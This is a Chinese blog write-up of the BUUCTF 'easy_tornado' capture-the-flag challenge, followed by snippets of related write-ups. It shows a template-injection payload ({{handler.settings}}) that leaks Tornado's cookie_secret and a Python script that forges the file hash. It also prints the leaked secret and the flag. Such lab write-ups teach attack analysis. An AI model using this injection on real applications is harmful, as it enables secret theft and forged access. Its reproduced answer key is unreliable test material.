buuctf easy-tornado

最新推荐文章于 2023-06-10 15:13:20 发布
最新推荐文章于 2023-06-10 15:13:20 发布
阅读量481 收藏 3
点赞数
文章标签: tornado python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ANYOUZHEN/article/details/124983143
版权

打开后,flag.txt直接说明了,最终的flag在/fllllllllllllag文件下

hints.txt下提示是filehash,要是md5(cookie_secret+md5(filename))才可以结合/fllllllllllllag找到flag

发现他们的url都是由filename和filehash组成。filehash是他们filename的md5值。
当filename或filehash不匹配时,将会跳转到http://web9.buuoj.cn/error?msg=Error Error页面.
当看到msg参数时,就立刻想到了模块注入。尝试了/error?msg={{1}},发现的确存在模块注入。

 render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页 ,如果用户对render内容可控,不仅可以注入XSS代码,而且还可以通过{{}}进行传递变量和执行简单的表达式。
Tornado是一种 Web 服务器软件的开源版本。Tornado 和现在的主流 Web 服务器框架(包括大多数 Python 的框架)有着明显的区别:它是非阻塞式服务器,而且速度相当快。
 

 在tornado模板中,存在一些可以访问的快速对象,这里用到的是handler.settings,handler指向RequestHandler,而RequestHandler.settings又指向self.application.settings,所以handler.settings就指向RequestHandler.application.settings了,这里面就是我们的一些环境变量
 

输入 /error?msg={{handler.settings}} 

找到cookie_secret为a9e5390d-4a90-4d74-9b45-f98edb9f2447

这里我们利用python脚本来进行解题

import hashlib

file_hash = hashlib.md5()

filename = '/fllllllllllllag'
file_hash.update(filename.encode('utf-8'))
s1 = file_hash.hexdigest()

cookie_secret = "a9e5390d-4a90-4d74-9b45-f98edb9f2447"

file_hash = hashlib.md5()
file_hash.update((cookie_secret + s1).encode('utf-8'))

print(file_hash.hexdigest())

6636bd0931c4024ad049d76991a45b71

访问:

/file?filename=/fllllllllllllag&filehash=6636bd0931c4024ad049d76991a45b71

flag{8c4b42b5-1bce-4e36-a16a-c5fc2b14443e} 

ANYOUZHEN
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
whisper-tornado 依赖
05-21
Tornado 是一个 Python Web 框架和异步网络库,它源自 FriendFeed 团队的需求,后来被 Facebook 收购并开源。在 Tornado 中集成 whisper 提供了实时数据处理和分析的能力,尤其是在大数据量的流式处理场景下。 ...
Fire-Tornado unity 火焰
04-13
Fire-Tornado unity 火焰
[BUUCTF] easy_tornado (writeup)
weixin_63306244的博客
06-10 236
tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入XSS代码,而且还可以通过{{}}进行传递变量和执行简单的表达式。根据 flag.txt 和 hints.txt 的提示我们得出flag在/fllllllllllllag里面。回显了orz,回想welcome.txt 有提示render。有了cookie_secret后根据hints.txt。进入靶机后发现了三个文件,分别是。由此得到payload为。
msg提示错误方法怎么用
weixin_42610671的博客
02-11 1680
如果您在使用软件时遇到了 "msg error" 的提示,您可以以下几种方法尝试解决问题: 检查您的输入:确保您的输入是正确的,并且符合系统的要求。 重新启动计算机:有时候,重新启动计算机可以解决一些技术问题。 更新软件:如果您正在使用的软件是最新版本,请确保系统上安装了所有更新。 检查操作系统:如果您的操作系统有更新,请将其安装在您的计算机上。 寻求技术支持:如果您仍然无法解决问题,请...
web buuctf [护网杯 2018]easy_tornado1
weixin_44214568的博客
03-12 4440
分解信息量: 1.题目名称是easy-tornadotornadopython的web框架(web框架的产生是避免程序代码与html编码的编码混乱性,框架将传参过程进行独立) 2.打开一共三个链接,分别点开 /flag.txt 提示内容:flag in /fllllllllllllag ,意思就是flag在文件fllllllllllllag里面,需要考虑怎么进入文件里面 /welcome.txt 提示内容:render,render是tornado里面的渲染函数,就是对web网页界面进行编辑的函
buuctf easy-tornado(cookie_secret)
qq_54929891的博客
02-27 1654
进入url可以看到三个超链接 都分别点开看看 并且发现url中传输了两个参数,一个是filename,另一个是filehash,在flag.txt中将filename改为提示的/fllllllllllllag试一试 看来拿到flag的关键就在于解出filehash是什么,根据连接的提示,我们可以猜想filehash=md5(cookie_secret+md5(filename)),filename我们知道就是/fllllllllllllag,但是cookie _secret我们就不.
BUUCTFeasy_tornado
qq_40646572的博客
05-15 894
打开题目网站,发现存在三个文件,都打开看了下,在hint.txt文件中发现提示。 在flag.txt文件中也有提示flag在/fllllllllllllag文件中。 整理下思路,这道题其实关键点在于hint.txt文件中的cookie_secret值。 但考虑到题目名中包含tornado这个关键词,百度下发现这是一个python的web框架,搜索下是否存在可以读取配置文件的漏洞,发现这个框架存在可以读取配置文件的漏洞。 想到还有一个welcome.txt文件,上面提示到render,渲染。想到ss..
python测验,hello-tornado.rar
05-14
Python测验中的“hello-tornado.rar”文件是一个与Python编程语言和Tornado Web框架相关的学习资源。Tornado是一个开源的、高性能的Web服务器和异步网络库,最初由FriendFeed团队开发,后来被Facebook收购并公开发布...
python后端服务project-of-tornado.rar
05-14
在这个项目中,我们关注的是基于 Tornado 框架构建的后端服务。Tornado 是一个轻量级、高性能的 Web 服务器和异步网络库,特别适合于长连接和实时Web应用。 标题 "project-of-tornado.rar" 提示这是一个关于 ...
ubuntu-python3-whisper-tornado docker镜像
05-21
ubuntu-python3-whisper-tornado docker镜像,可下载直接使用
http-benchmark-tornado:基于Python Tornado的高级http性能测试工具。JavaNetty版:https:github.comjunneyanghttp-benchmark-netty
02-03
高性能,基于开源异步网络框架tornado开发,QPS轻松达到15000左右。 支持随机发送。 支持进程数,最大连接数,客户端个数,测试时间,是否打印输出结果,测试数据等灵活配置。 统计输出完备,支持QPS统计,延迟统计...
ubuntu-python3-whisper-tornado docker镜像07
05-21
ubuntu-python3-whisper-tornado docker镜像,可下载直接使用
ubuntu-python3-whisper-tornado docker镜像09
05-21
ubuntu-python3-whisper-tornado docker镜像,可下载直接使用
ubuntu-python3-whisper-tornado docker镜像 Dockerfile
最新发布
05-21
ubuntu-python3-whisper-tornado docker镜像 Dockerfile
sockjs-tornado:WebSocket仿真-Python服务器
02-27
SockJS龙卷风服务器SockJS-tornado是在框架上运行的的Python服务器端对应项。 简化后的Echo SockJS服务器看起来或多或少像: 从龙卷风导入Web,从sockjs.ionio导入ioloop从SockJSRouter,SockJSConnection ...
buuctf-easy_tornado
xixihahawuwu的博客
11-23 161
打开题目环境 进去之后有三个文件,依次打开 直接告诉我们flag的位置 Render是python中的一个渲染函数,渲染变量到不同模块中,就可以通过传递不同参数 形成不同的界面 filehash=md5(cookie_secret+md5(filename)) 现在filename=/fllllllllllllag,只需要知道cookie_secret的既能访问flag。 当我尝试着直接修改payload时,弹出来一个错误界面,仔细看url,出现了新的参数 这里不知道是什么东西,去查了下,这里可能存在.
漏洞复现-easy_tornado
qq_59350385的博客
07-04 276
windowsFirefoxtornadopython中的一个web应用框架。拿到题目发现有三个文件:flag.txt 发现flag在/fllllllllllllag文件里;welcome.txt render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。hints.txt filehash=md5(cookie_secret+md5(filename)) 现在filename=/fllllllllllllag,只需要知道cookie_secret的
BUUCTF[护网杯 2018]easy_tornado1-write up
m0_62851980的博客
04-23 895
知识点: SSTI(模板注入),render函数,Tornado框架(知识点在最后) 打开靶机,看到三个链接: 分别点进去: 注意每个链接的url: /file?filename=/xxx&filehash=32位MD5 根据flag.txt和hint.txt提示url的形式为:文件名+32位MD5 再看hint.txt的提示:md5(cookie_secret+md5(filename))。明显我们要先找到cookie_secret进行MD5加密,再和进行MD5加密后输入的文
buuctf easyRE
weixin_45701079的博客
10-18 1036
buuctf easyRE[2019红帽杯] 简单总结一下,一般说是easy的都不简单 加载ida查看字符串,找到主要函数, 第一组数据解出 Info:The first four chars are flag 然后看下面,打开函数发现是base64加密,加密十次,然后比较,把字符串解密十次,发现给了一个网址(不好意思,网址给关了,不想再解密10次了,就口头描述一下),打开网址,发现是… 然后看大佬博客,才知道是个迷惑我们的函数,真正的核心函数在上图所示函数的下一个(wdnmd)口吐芬芳 然后利用”f
python3-tornado
01-30
Python3-tornado是一个基于Python的Web框架,它使用非阻塞的I/O模型,可以处理高并发的网络请求。它的特点是轻量级、高效、易用,适用于开发高性能的Web应用和实时应用程序。 以下是一个简单的Python3-tornado示例...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值